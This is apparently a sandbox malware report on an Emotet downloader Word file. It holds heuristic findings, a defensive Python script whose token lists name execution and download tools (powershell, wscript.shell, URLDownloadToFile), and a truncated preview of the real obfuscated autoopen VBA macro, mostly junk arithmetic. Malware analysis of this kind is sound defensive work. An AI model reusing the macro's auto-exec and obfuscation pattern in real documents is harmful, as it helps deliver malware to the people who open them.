Verdict: MALICIOUS
Risk Score: 222
Malware Insights
MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1566.001 Phishing: Spearphishing Attachment
The file is identified as malicious by ClamAV with the signature Doc.Downloader.Emotet-6954529-0. Static analysis found an auto-executing VBA macro (autoopen) that calls GetObject, a common way to instantiate an object that then downloads and executes a payload. The recovered source is heavily obfuscated: randomized identifier names and long stretches of meaningless arithmetic on never-assigned variables pad out the real logic. Together with the Emotet family attribution this strongly suggests the document is a downloader. Note that the preview exposes no network indicator; the only URL extracted is a benign OOXML schema namespace from the document body, so the payload location is not recoverable from this static view alone.
Heuristics (7)
- ClamAV: Doc.Downloader.Emotet-6954529-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.Emotet-6954529-0
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- GetObject call (high, OLE_VBA_GETOBJ): GetObject call
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
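The findings above are produced by pattern heuristics over the recovered macro source and over the compiled module stream. The following is an added example (not the analyzer's code, and not part of the original report) that reimplements the same three checks in Python: an auto-exec entry point (OLE_VBA_AUTOOPEN), an object-instantiation or execution token (OLE_VBA_GETOBJ), and the p-code fallback that searches a raw stream for both token classes when no source can be decoded (OLE_VBA_PCODE_AUTOEXEC_EXEC). It also measures the share of statements that are pure junk arithmetic, the padding pattern visible throughout the preview. The token lists, the junk-arithmetic rule and the sample macro are assumptions chosen for illustration; the sample is constructed after the preview, and its GetObject line is invented because the preview is truncated before any such call.

```python
"""Heuristic triage of extracted VBA source, modelled on the OLE_VBA_* findings in the report.

Added example (not the analyzer's own code): the token lists and the junk rule are
assumptions chosen for illustration. Usage: python vba_triage.py macros.bas
"""
import re
from dataclasses import dataclass, field

# Procedure names Office runs without user interaction (Word/Excel VBA and legacy WordBasic).
AUTO_EXEC = ("autoopen", "autoexec", "autoclose", "autonew", "autoexit",
             "document_open", "document_close", "workbook_open", "auto_open")
# Tokens that instantiate, download or run something; GetObject is the one flagged on this sample.
EXEC_TOKENS = ("getobject", "createobject", "shell", "wscript.shell", "powershell",
               "urldownloadtofile", "xmlhttp", "adodb.stream", "callbyname", "mshta", "cmd.exe")
# Built-ins the padding arithmetic in the preview leans on; a call to anything else is real work.
MATH_FUNCS = {"hex", "fix", "round", "sqr", "cstr", "abs", "int", "clng", "cint", "log", "sin", "cos"}

PROC = re.compile(r"^\s*(?:Private\s+|Public\s+)?(?:Sub|Function)\s+(\w+)", re.M | re.I)
ASSIGN = re.compile(r"^\s*(?:Set\s+)?\w+\s*=\s*(.+?)\s*$")


@dataclass
class Findings:
    auto_exec: list = field(default_factory=list)
    exec_tokens: list = field(default_factory=list)
    junk_ratio: float = 0.0  # share of statements that are pure arithmetic padding

    @property
    def suspicious(self):
        # Same combination the report uses: an auto-exec entry point plus an execution token.
        return bool(self.auto_exec and self.exec_tokens)


def join_continuations(src):
    """VBA continues a statement on the next line with a trailing ' _'; the macro above uses this
    heavily to split expressions, so fold continuations before matching anything."""
    return re.sub(r"[ \t]_\r?\n[ \t]*", " ", src)


def is_junk_arithmetic(stmt):
    """An assignment whose right-hand side is only operators, numbers, identifiers and VBA math
    built-ins: the padding pattern seen throughout the preview (Hex(...), Fix(...), Sqr(...))."""
    m = ASSIGN.match(stmt)
    if not m:
        return False
    rhs = m.group(1)
    if '"' in rhs or not re.search(r"[-+*/]", rhs):
        return False
    calls = re.findall(r"(\w+)\s*\(", rhs)
    return all(c.lower() in MATH_FUNCS for c in calls)


def scan_vba_source(src):
    """OLE_VBA_AUTOOPEN / OLE_VBA_GETOBJ analogue over decoded VBA source text."""
    text = join_continuations(src)
    f = Findings()
    f.auto_exec = [m.group(1) for m in PROC.finditer(text) if m.group(1).lower() in AUTO_EXEC]
    low = text.lower()
    f.exec_tokens = [t for t in EXEC_TOKENS
                     if re.search(r"(?<![\w.])" + re.escape(t) + r"(?!\w)", low)]
    stmts = [ln.strip() for ln in text.splitlines()
             if ln.strip() and not ln.lstrip().startswith("Attribute ")]
    if stmts:
        f.junk_ratio = sum(is_junk_arithmetic(s) for s in stmts) / len(stmts)
    return f


def scan_compiled_stream(blob):
    """OLE_VBA_PCODE_AUTOEXEC_EXEC analogue: when source cannot be recovered, procedure and
    identifier names still appear in the module's compiled/cache stream, as ANSI or UTF-16LE.
    Returns (auto-exec names found, execution tokens found); both non-empty is the finding."""
    low = blob.lower()  # bytes.lower() only touches ASCII letters, so UTF-16LE NULs survive

    def present(tok):
        return tok.encode() in low or tok.encode("utf-16-le") in low

    return [t for t in AUTO_EXEC if present(t)], [t for t in EXEC_TOKENS if present(t)]


# Constructed sample modelled on the preview above. The GetObject line is invented for
# illustration: the preview is truncated before the macro reaches any such call.
SAMPLE_MACRO = '''Attribute VB_Name = "iDXU_U"
Sub autoopen()
If oGZQQcBA = RBAAAAAA Then
QCZAk_XU = _
OBXCQXo - _
DQUw_A
End If
kx14cGDQ = 517487929 * CUGAAx / _
55447786 * Hex(286699267 * Fix(BAGBAA))
Set zADxxCk = GetObject(sGUQGA)
End Sub
'''

if __name__ == "__main__":
    import sys
    src = (open(sys.argv[1], encoding="utf-8", errors="replace").read()
           if len(sys.argv) > 1 else SAMPLE_MACRO)
    f = scan_vba_source(src)
    print(f"auto-exec: {f.auto_exec}  exec tokens: {f.exec_tokens}  "
          f"junk ratio: {f.junk_ratio:.2f}  suspicious: {f.suspicious}")
```

Run against the carved macros.bas, the source check will report autoopen and whichever execution tokens appear past the truncation point, and a junk ratio close to 1.0 is itself a useful obfuscation signal even before the real call is located. The stream check is deliberately crude (substring search in both encodings) because it exists for the case where nothing better is available; a hit there should send the analyst to the p-code, not be treated as a verdict on its own.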
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 63597 bytes |

SHA-256: a801be4ed305d32cb250383bf49937aaebcd3b78fa154addeb6abc80a780899e

Preview: first 1,000 lines of the extracted script
Attribute VB_Name = "oGGQGZG"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "zADxxCk"
Attribute VB_Base = "0{8C95744E-5F3D-487F-964B-2747704AF649}{F4630A7E-3C1F-4513-B4F7-B4DE18C5AB21}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "EQ_A1AA"
Attribute VB_Base = "0{FBE467EA-ECFC-4E9B-9B9F-1C757376625A}{EC6E0ED7-893C-4A35-8279-76D07E27233A}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "iDXU_U"
Sub autoopen()
If oGZQQcBA = RBAAAAAA Then
QCZAk_XU = _
OBXCQXo - _
DQUw_A
ElseIf bx_CDBA = IAAAQ_1w Then
Select Case hwDCX4Z
Case 110416547
kx14cGDQ = _
517487929 * CUGAAx / _
55447786 * Hex(286699267 * _
Fix(BAGBAA / CStr(RB_kGA) * rAkDQUAX _
- Fix(605874879)) - 809429588 * Round(SB_AUAGw + _
Hex(lZ1AXDBA) / 740403290 - 526084163))
KcAwAA = N__XCQD + s_oADA4 * _
aAAGDAc / Sqr(YGZ_DXA) / 495070957 - _
Hex(FAUAwQ) + (876151266 / 54028840)
End Select
End If
If iBAwcA = iA4oQUA Then
LUx41CQ = _
WUUQUDAA - _
rDAwo1C
ElseIf ZZoAcDAD = Oo4DXxkA Then
Select Case b4UZQAAD
Case 473330313
TQGAAQ = _
385813594 * vUADAGAx / _
956930486 * Hex(211259763 * _
Fix(GADoAU / CStr(iAoCDA) * WC_AAkxA _
- Fix(460361378)) - 333027254 * Round(iUkAAX + _
Hex(PQ_kBAx) / 161780148 - 834367034))
lBA4xA = AAQU_BA + jAQXG4 * _
YAoUDBc / Sqr(HQDADQ) / 418849191 - _
Hex(MQDxBU) + (927220805 / 771565855)
End Select
End If
If XB4AGDA = fDABG1D Then
zcABABG = _
ix4cAGx - _
zBX__UA
ElseIf UAXokZAc = tUAA4_A4 Then
Select Case okB4QUQ
Case 374932734
Fw_B1AU = _
727810321 * MAQAAk / _
916045225 * Hex(696189695 * _
Fix(VD_DCAA4 / CStr(wD_4GACX) * EAUADA _
- Fix(589767319)) - 323050499 * Round(ZBQBkxQ + _
Hex(BUAAXXBo) / 950286003 - 579642724))
kBAoDU = ZGAA_wD4 + ioB1BQ1 * _
dZBAAC_ / Sqr(QGx4AA) / 403555160 - _
Hex(hAcDAc_) + (917381255 / 621976857)
End Select
End If
iAAcAA
If QBQBCAAU = WXX1kA Then
rQBAcGwA = _
EkoZAX4 - _
LAAcAAx_
ElseIf jBoUUAU = soDACAA Then
Select Case w_cGQA
Case 885621654
oQ4cXQA = _
168428296 * U_UxBX / _
756507822 * Hex(835455261 * _
Fix(SBXCoQ / CStr(zAAAUAA) * tGBoQAUc _
- Fix(670171378)) - 236109086 * Round(XQ4AGX + _
Hex(hDGDAwB) / 789002970 - 567246692))
GAUoAxk = pcw1AAZ + oxDcxXQx * _
iA4UAA / Sqr(Do_xB4DQ) / 658090868 - _
Hex(jwUQCQA) + (352399185 / 141728341)
End Select
End If
If JADxAC = zkQBwDk Then
dA11BQ = _
AQwkAxo - _
WAQAUZ
ElseIf dAQADA_o = iAU4Qx_A Then
Select Case NDDoAA
Case 939790074
KXCBAcD = _
526859553 * mQwCX1DB / _
812273676 * Hex(789707776 * _
Fix(ZDGAZAG / CStr(sGUQGA) * jX_AcG _
- Fix(256915025)) - 47304767 * Round(dGAkxUBU + _
Hex(oZxBCQoD) / 814872421 - 171342607))
f1X411Z = iAUDQAA + vcQBZkA4 * _
pAwcUA / Sqr(zUAQXA) / 480355762 - _
Hex(jQXcAA) + (135699430 / 251439582)
End Select
End If
If iA_UBkAQ = DwoQ4A Then
sAUAAAAD = _
D4ABGUwA - _
rZAAA_Ac
ElseIf bQAZxAAw = D_QZ_AX Then
Select Case JACXQCD
Case 517970095
sxG4BA = _
524895571 * c4_cAXU / _
361088872 * Hex(983684066 * _
Fix(q11U4UB / CStr(cGQ4AC) * sGAC_AC _
- Fix(960417603)) - 725145965 * Round(AABDDA + _
Hex(kAx_UXG) / 888935921 - 889020575))
DBQAZAXA = TAoAUAD + YQAUCk * _
cAQBAA / Sqr(P_ZDAA) / 435460802 - _
Hex(RAAU1B) + (305101739 / 921126950)
End Select
End If
En
... (truncated)